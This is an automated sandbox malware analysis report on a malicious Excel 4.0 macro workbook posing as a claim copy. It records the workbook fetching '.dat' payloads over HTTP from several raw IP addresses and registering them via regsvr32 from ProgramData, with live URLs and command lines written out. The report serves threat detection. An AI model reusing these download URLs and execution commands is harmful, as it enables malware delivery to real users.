Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ClaimCopy-355714047-12022021.xlsb

Overview

General Information

Sample Name:ClaimCopy-355714047-12022021.xlsb
Analysis ID:532933
MD5:1f51fa867f5bbce3ab1cc40bf75f7f9b
SHA1:2c690539b53f4db35af92e2b88880c3d76fcd323
SHA256:f3dc3443c7ba185b1c8eff63807384e9bb6734fa0774d9964213dd9baf3fb3c3
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected potential crypto function
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5140 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 2484 cmdline: regsvr32 C:\ProgramData\Volet1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4028 cmdline: regsvr32 C:\ProgramData\Volet2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4248 cmdline: regsvr32 C:\ProgramData\Volet3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3324 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5320 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6200 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5140, ProcessCommandLine: regsvr32 C:\ProgramData\Volet1.ocx, ProcessId: 2484

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: ClaimCopy-355714047-12022021.xlsbVirustotal: Detection: 10%Perma Link
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.3:49746 -> 185.82.126.78:80
    Source: global trafficTCP traffic: 192.168.2.3:49749 -> 158.69.133.78:80
    Source: global trafficHTTP traffic detected: GET /823634401007.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /823634401007.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 45.142.211.62 45.142.211.62
    Source: Joe Sandbox ViewIP Address: 158.69.133.78 158.69.133.78
    Source: Joe Sandbox ViewIP Address: 185.82.126.78 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 19:59:28 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 20:00:32 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/823634401007.dat
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/823634401007.dat2
    Source: EXCEL.EXE, 00000001.00000003.560465239.00000000158AF000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/P
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/823634401007.dat
    Source: EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/823634401007.dat)
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/823634401007.dat2
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/823634401007.datr
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/823634401007.dat2
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/823634401007.dat2vdom
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/823634401007.datw
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/823634401007.datz
    Source: EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides8
    Source: EXCEL.EXE, 00000001.00000002.749371941.000000000D761000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
    Source: EXCEL.EXE, 00000001.00000002.749307677.000000000D741000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
    Source: EXCEL.EXE, 00000001.00000003.286450934.00000000159E1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.287299285.00000000159E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285161612.00000000159E3000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.283687699.00000000159E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.283008146.00000000159E2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mico
    Source: EXCEL.EXE, 00000001.00000003.596899299.0000000015B4A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.597271004.0000000015B10000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.596937498.0000000015B7A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000001.00000003.596937498.0000000015B7A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
    Source: EXCEL.EXE, 00000001.00000003.596899299.0000000015B4A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.597271004.0000000015B10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxedK
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionloggingu_ul
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadsnjn5
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticatedBearer
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryMOXl
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/entitlement/queryem
    Source: EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
